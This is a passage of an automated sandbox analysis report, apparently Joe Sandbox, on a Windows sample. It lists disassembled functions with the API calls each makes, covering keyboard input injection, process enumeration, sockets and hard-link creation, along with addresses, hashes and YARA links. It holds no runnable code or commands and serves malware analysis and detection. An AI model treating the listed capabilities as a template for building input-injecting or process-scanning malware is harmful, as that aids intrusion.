                                                                                                                                                                                                                                                                                                          • Part of subcall function 010136F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01013712
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010136F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 01013723
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010136F4: GetCurrentThreadId.KERNEL32 ref: 0101372A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010136F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01013731
                                                                                                                                                                                                                                                                                                        • GetFocus.USER32 ref: 010138C4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101373B: GetParent.USER32(00000000), ref: 01013746
                                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0101390F
                                                                                                                                                                                                                                                                                                        • EnumChildWindows.USER32(?,01013987), ref: 01013937
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: %s%d
                                                                                                                                                                                                                                                                                                        • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                                        • Opcode ID: 15d8f1032118b1e1a5ef479a81c30710a0eaf0da53861a1ce0c768da110cb583
                                                                                                                                                                                                                                                                                                        • Instruction ID: b6e3900b2077477a2456b9640d041f8f0d1722dd9441a0116347241697d6da9f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d8f1032118b1e1a5ef479a81c30710a0eaf0da53861a1ce0c768da110cb583
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6511D8B56002099BCF117F749D85AED77AEBFA8314F048079A9899F145CE395805DB20
                                                                                                                                                                                                                                                                                                        Function 01046321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 01046360
                                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0104638D
                                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32(?), ref: 0104639C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: 43524f2819f7b952b8ed3bcb2f16e4d642229eb32c25e53b83b149a1490ca603
                                                                                                                                                                                                                                                                                                        • Instruction ID: 697851473f0e2d0a990d97bb7156d0ee9f108f117534224c76a7161996de80bf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43524f2819f7b952b8ed3bcb2f16e4d642229eb32c25e53b83b149a1490ca603
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28018BB1500218AFDB219F54DC84BAE7BB5FB45311F04C0AAE88996140DF358A80EF21
                                                                                                                                                                                                                                                                                                        Function 0101096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9b6796fabeee457a187bbe5171dd91badd4b6e27d214f8589941f401f92ed18a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 855e7a0d77a0bd0e5f012992610a3c13871798c6ef74af3a4a3ae7a2ea02e4dd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b6796fabeee457a187bbe5171dd91badd4b6e27d214f8589941f401f92ed18a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22C16C75A0020AEFDB04CF98C884EAEBBB5FF48704F148198F5859B259D735EE81CB90
                                                                                                                                                                                                                                                                                                        Function 00FE41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                        • Instruction ID: e760c005c3f850a7c28a7a01b15434c070498508a139cca932271b011b5a302b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7A15B72E003C69FDB11DF1AC8917AEBBE5EF51324F1841ADE9559B2C1C338A941E750
                                                                                                                                                                                                                                                                                                        Function 01010D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01050BD4,?), ref: 01010EE0
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01050BD4,?), ref: 01010EF8
                                                                                                                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0104DCE0,000000FF,?,00000000,00000800,00000000,?,01050BD4,?), ref: 01010F1D
                                                                                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 01010F3E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d18d3e659961418f99b08e7a2493559d28bdcba2ed2591a935d41a5cb5282356
                                                                                                                                                                                                                                                                                                        • Instruction ID: bb760bd861a384fffd498b41b1dca5083b8e890536a441853cd3532c272906d7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d18d3e659961418f99b08e7a2493559d28bdcba2ed2591a935d41a5cb5282356
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3813975A00109EFCB00DF98C984EEEB7B9FF89315F204198F546AB254DB75AE46CB60
                                                                                                                                                                                                                                                                                                        Function 0103B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0103B10C
                                                                                                                                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0103B11A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0103B1FC
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103B20B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00FF4D73,?), ref: 00FCE395
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0063bd360342d37e6f042a11fe576b89944aafd49dfb72f42d222048c0875c45
                                                                                                                                                                                                                                                                                                        • Instruction ID: f7ecad2c84b98259f6025c80d8400670c1f057a9ba54227c3e249498eb917ccf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0063bd360342d37e6f042a11fe576b89944aafd49dfb72f42d222048c0875c45
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 155148B1A08301AFD310EF25C886A9BBBE8FF89754F40491DF98597251EB75E904CF92
                                                                                                                                                                                                                                                                                                        Function 00FF1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b3e7fc991bb9881c372c6564d80fec80e11ac36f96c6f2607920ae752983608e
                                                                                                                                                                                                                                                                                                        • Instruction ID: f44905d9c8cbb7a6f7345a4142cbf905164e3a4a10b4ea874fd77f562288346b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3e7fc991bb9881c372c6564d80fec80e11ac36f96c6f2607920ae752983608e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A412D32A00148EBDB217FBA8D81E7E36A5FF41770F180226FA18D62B1D7798845B761
                                                                                                                                                                                                                                                                                                        Function 01032533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 0103255A
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 01032568
                                                                                                                                                                                                                                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 010325E7
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 010325F1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 37d3d606c9c5a1a516322885f0c9bc5b56a3c2ef7dd4dc50b7a6ec2981b703c7
                                                                                                                                                                                                                                                                                                        • Instruction ID: b708a595fc60356a41d1cdb4771d3c3ef52cca761594a1c5e5eece0722a1a198
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37d3d606c9c5a1a516322885f0c9bc5b56a3c2ef7dd4dc50b7a6ec2981b703c7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C841A374A00200AFE720AF24C886F6677D5AF84758F54C48CF55A8F2C3D776ED429B90
                                                                                                                                                                                                                                                                                                        Function 01046CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 01046D1A
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 01046D4D
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 01046DBA
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: efb78aeb23b7440870d6e8a3fd485c3c136350699906676b2747260eec3d7eee
                                                                                                                                                                                                                                                                                                        • Instruction ID: e4ce879ec845fe83ccd2ab441bea3e71f615f994183dfc736b3d17aeb19ca784
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efb78aeb23b7440870d6e8a3fd485c3c136350699906676b2747260eec3d7eee
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 625151B4900209EFCF65DF58D8C09AE7BF6FF45360F1081A9F99597291E732A981CB50
                                                                                                                                                                                                                                                                                                        Function 00FEB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 48e6fd1e9112917ae2d9d440678348100c5bb30b423f2ce667e02db34dfb9407
                                                                                                                                                                                                                                                                                                        • Instruction ID: 97ce7ad373e1c1cab9c61ab5200f6bb3dee1af6d6ee75eaf56e3620db61c9c1f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48e6fd1e9112917ae2d9d440678348100c5bb30b423f2ce667e02db34dfb9407
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38411572A00744AFE724AF79CC41B6BBBADEF88720F10852AF151DB791D3759A029780
                                                                                                                                                                                                                                                                                                        Function 0102611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 010261C8
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 010261EE
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 01026213
                                                                                                                                                                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0102623F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 194e936b667c108544b2cc3b7038db3b5fc86050bc51d8f0a21b57dafec8e4aa
                                                                                                                                                                                                                                                                                                        • Instruction ID: 35bc8095531b1e1ba3b47ce4449d6c4522f4c8c6edb4532548a37ee6bf0c5bd1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 194e936b667c108544b2cc3b7038db3b5fc86050bc51d8f0a21b57dafec8e4aa
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82415F39600610DFCB11DF55C584A9EBBE6EF99710B188488EC4A9B362CB39FC05DF91
                                                                                                                                                                                                                                                                                                        Function 0101B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0101B473
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0101B48F
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0101B4FD
                                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0101B54F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6375aa7e8170906c2d90ff35907b48cc4c307db062aeb9fb8ac99f4b832891fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8c063cf827d7d3f9e7351cf16e1297e973505fef8f6998df9c03a4b5909ddcad
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6375aa7e8170906c2d90ff35907b48cc4c307db062aeb9fb8ac99f4b832891fc
